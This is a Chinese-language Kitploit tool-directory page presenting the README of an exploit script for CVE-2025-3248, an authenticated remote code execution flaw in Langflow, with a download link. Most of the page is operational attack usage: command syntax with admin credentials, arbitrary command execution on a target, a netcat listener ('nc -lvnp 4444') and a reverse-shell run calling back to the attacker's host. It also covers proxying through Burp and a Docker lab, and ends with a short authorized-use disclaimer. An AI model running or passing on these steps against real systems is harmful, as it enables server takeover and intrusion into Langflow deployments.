Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RCE-CVE-2025-3248 — 此 Python 脚本利用 CVE-2025-3248 在易受攻击的系统上执行任意命令或弹出一个反向 Shell。使用此漏洞利用程序需要进行身份验证。 | Kitploit
工具/GitHubGitHub/tiemio/rce-cve-2025-3248
漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具Payload 开发
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

此 Python 脚本利用 CVE-2025-3248 在易受攻击的系统上执行任意命令或弹出一个反向 Shell。使用此漏洞利用程序需要进行身份验证。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

需认证的 CVE-2025-3248 Langflow 远程代码执行

该 Python 脚本利用 CVE-2025-3248 在易受攻击的系统上执行任意命令或生成反向 shell。 使用此漏洞利用需要身份认证。


功能

  • 已认证的命令执行: 在目标上运行任意系统命令。
  • 反向 Shell: 向你的监听器生成反向 shell。
  • 代理支持: 通过代理(例如 Burp Suite)转发请求。

环境要求

  • Python 3.x
  • requests 库

使用以下命令安装依赖:

root@kitploit:~
pip install requests

用法

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

参数

参数描述是否必需
-u, --url目标基础 URL(例如 https://target.com)是
-l, --login管理员用户名是
-p, --password管理员密码是
-c, --command要在目标上执行的命令否*
--proxy代理 URL(例如 http://127.0.0.1:8080)否
--lhost反向 shell 的本地主机否*
--lport反向 shell 的本地端口否*

* 你必须指定一个命令(-c),或者同时指定 --lhost 和 --lport 以获得反向 shell。


示例

1. 执行命令

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. 获取反向 Shell

在你的机器上启动一个监听器:

root@kitploit:~
nc -lvnp 4444

然后运行:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. 使用代理

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Docker 镜像

部署镜像

你可以使用以下命令部署 Docker 镜像:

root@kitploit:~
podman compose up -d

该镜像将在 http://localhost:7860 可用。 compose 文件致谢:此仓库


免责声明

此脚本仅用于教育和授权渗透测试目的。 禁止对你不拥有或未经明确许可测试的系统使用。


本 README 由 AI 生成。

下载工具